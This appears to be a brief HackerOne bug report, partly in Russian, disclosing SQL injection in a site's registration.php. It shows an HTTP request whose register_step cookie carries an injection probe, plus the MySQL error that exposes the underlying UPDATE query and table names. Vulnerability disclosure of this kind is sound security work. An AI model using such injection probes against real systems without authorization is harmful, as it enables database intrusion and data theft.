ID H1:10081
Type hackerone
Reporter vah13
Modified 2014-08-16T07:22:06


  1. для SQL inj. GET /registration.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: ru,en-us;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: trid=13986459646865;; partnerid=st; register_race=0; register_step=1%20and%201%3d1%20'; lol_filter=1; Connection: keep-alive Cache-Control: max-age=0

UPDATE botva_all_logs.register_logs SET dateupdate = '1398656471' , last_step = '1 and 1=1 \\'' WHERE last_step < 1 and 1=1 \' and sessionid='13986459646865' <br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and sessionid='13986459646865'' at line 1

в операторе WHERE last_step < 1 паратры не экранизируются.